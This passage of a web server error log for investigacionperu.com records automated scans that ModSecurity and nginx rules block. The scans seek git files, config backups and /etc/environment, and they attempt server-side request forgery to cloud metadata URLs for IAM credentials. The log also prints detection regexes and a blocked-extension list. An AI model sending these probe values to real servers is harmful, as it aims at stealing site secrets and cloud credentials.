(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Mar 18 23:26:02.237505 2025] [autoindex:error] [pid 16882:tid 140293160498944] [client 154.38.167.9:55080] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 18 23:27:03.325540 2025] [autoindex:error] [pid 16881:tid 140293381707520] [client 154.38.167.9:55116] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/03/19 03:27:36 [error] 14511#14511: *329723 connect() failed (111: Connection refused) while connecting to upstream, client: 34.122.223.50, server: investigacionperu.com, request: "POST //xmlrpc.php HTTP/1.1", upstream: "http://198.199.72.26:8181//xmlrpc.php", host: "investigacionperu.com" [Thu Mar 20 06:05:56.566062 2025] [autoindex:error] [pid 3371:tid 140172498761472] [client 74.225.152.45:33292] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Mar 20 10:18:09.175907 2025] [autoindex:error] [pid 3129:tid 140172532332288] [client 194.163.129.207:38584] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Mar 20 11:42:23.223457 2025] [authz_core:error] [pid 3128:tid 140172481976064] [client 159.89.12.166:40708] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/20 11:42:29 [error] 3091#3091: *347924 access forbidden by rule, client: 159.89.12.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Mar 20 17:10:36.973068 2025] [authz_core:error] [pid 3126:tid 140172515546880] [client 159.89.12.166:55316] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/20 17:10:43 [error] 3090#3090: *356793 access forbidden by rule, client: 159.89.12.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/20 20:34:04 [error] 3090#3090: *359191 access forbidden by rule, client: 170.39.218.202, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Thu Mar 20 20:34:12.538167 2025] [:error] [pid 3129:tid 140172557510400] [client 170.39.218.202:58974] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/httpd.conf"] [unique_id "Z9zCFPkYnT-GrN2Y0_AA5QAAAIk"] [Thu Mar 20 20:35:08.487732 2025] [:error] [pid 3129:tid 140172490368768] [client 170.39.218.202:59034] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/config/php.ini"] [unique_id "Z9zCTPkYnT-GrN2Y0_AA7QAAAJE"] 2025/03/20 20:35:13 [error] 3091#3091: *359192 access forbidden by rule, client: 170.39.218.202, server: investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "investigacionperu.com" [Thu Mar 20 20:36:11.115090 2025] [:error] [pid 3371:tid 140172557510400] [client 170.39.218.202:59108] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php.ini"] [unique_id "Z9zCi8fmlO6a7fiT45wnPQAAAMk"] [Thu Mar 20 20:37:04.143475 2025] [:error] [pid 3129:tid 140172507154176] [client 170.39.218.202:59164] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/php_errors.log"] [unique_id "Z9zCwPkYnT-GrN2Y0_AA_AAAAI8"] [Thu Mar 20 20:37:40.650158 2025] [:error] [pid 3371:tid 140172440012544] [client 170.39.218.202:59214] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Z9zC5MfmlO6a7fiT45wnUAAAANc"] [Thu Mar 20 20:39:04.270787 2025] [:error] [pid 3129:tid 140172523939584] [client 170.39.218.202:59348] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/storage/logs/laravel.log"] [unique_id "Z9zDOPkYnT-GrN2Y0_ABEAAAAI0"] [Thu Mar 20 20:40:10.656466 2025] [:error] [pid 3126:tid 140172591081216] [client 170.39.218.202:59488] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zDemMhIyLP9OhZaKG_UQAAAAU"] [Thu Mar 20 20:40:50.792961 2025] [:error] [pid 3128:tid 140172599473920] [client 170.39.218.202:59566] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zDosU4gj5kGAvbE6h81wAAAEQ"] [Thu Mar 20 20:40:50.868393 2025] [:error] [pid 3128:tid 140172549117696] [client 170.39.218.202:59568] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zDosU4gj5kGAvbE6h82AAAAEo"] [Thu Mar 20 20:40:50.943490 2025] [:error] [pid 3128:tid 140172456797952] [client 170.39.218.202:59570] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zDosU4gj5kGAvbE6h82QAAAFU"] [Thu Mar 20 20:40:51.018574 2025] [:error] [pid 3371:tid 140172515546880] [client 170.39.218.202:59572] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/user-data"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zDo8fmlO6a7fiT45wnjgAAAM4"] [Thu Mar 20 20:41:02.377491 2025] [:error] [pid 3126:tid 140172574295808] [client 170.39.218.202:59598] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:uri. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:uri: /etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zDrmMhIyLP9OhZaKG_XgAAAAc"] [Thu Mar 20 20:41:42.641217 2025] [:error] [pid 3126:tid 140172633044736] [client 170.39.218.202:59686] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:uri. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:uri: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zD1mMhIyLP9OhZaKG_agAAAAA"] [Thu Mar 20 20:41:42.716764 2025] [:error] [pid 3126:tid 140172574295808] [client 170.39.218.202:59688] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:uri. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:uri: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zD1mMhIyLP9OhZaKG_awAAAAc"] [Thu Mar 20 20:41:42.862699 2025] [:error] [pid 3126:tid 140172498761472] [client 170.39.218.202:59690] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:uri. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:uri: http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zD1mMhIyLP9OhZaKG_bAAAABA"] [Thu Mar 20 20:41:42.937779 2025] [:error] [pid 3128:tid 140172507154176] [client 170.39.218.202:59692] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:uri. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:uri: http://169.254.169.254/latest/user-data"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zD1sU4gj5kGAvbE6h84QAAAE8"] [Thu Mar 20 20:41:54.008153 2025] [:error] [pid 3126:tid 140172431619840] [client 170.39.218.202:59720] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zD4mMhIyLP9OhZaKG_cAAAABg"] [Thu Mar 20 20:42:32.082044 2025] [:error] [pid 3129:tid 140172565903104] [client 170.39.218.202:59802] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:file: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zECPkYnT-GrN2Y0_ABRQAAAIg"] [Thu Mar 20 20:42:32.157751 2025] [:error] [pid 3129:tid 140172540724992] [client 170.39.218.202:59804] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:file: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zECPkYnT-GrN2Y0_ABRgAAAIs"] [Thu Mar 20 20:42:32.232623 2025] [:error] [pid 3129:tid 140172490368768] [client 170.39.218.202:59806] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:file: http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zECPkYnT-GrN2Y0_ABRwAAAJE"] [Thu Mar 20 20:42:32.307711 2025] [:error] [pid 3129:tid 140172456797952] [client 170.39.218.202:59808] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:file: http://169.254.169.254/latest/user-data"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zECPkYnT-GrN2Y0_ABSAAAAJU"] [Thu Mar 20 20:42:42.346785 2025] [:error] [pid 3371:tid 140172481976064] [client 170.39.218.202:59832] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:target. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:target: /etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEEsfmlO6a7fiT45wnvQAAANI"] [Thu Mar 20 20:43:30.757537 2025] [:error] [pid 3128:tid 140172582688512] [client 170.39.218.202:59918] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:target. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:target: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEQsU4gj5kGAvbE6h89AAAAEY"] [Thu Mar 20 20:43:30.832381 2025] [:error] [pid 3128:tid 140172481976064] [client 170.39.218.202:59920] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:target. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:target: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEQsU4gj5kGAvbE6h89QAAAFI"] [Thu Mar 20 20:43:30.907495 2025] [:error] [pid 3128:tid 140172448405248] [client 170.39.218.202:59922] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:target. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:target: http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEQsU4gj5kGAvbE6h89gAAAFY"] [Thu Mar 20 20:43:30.982574 2025] [:error] [pid 3128:tid 140172523939584] [client 170.39.218.202:59924] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:target. [file 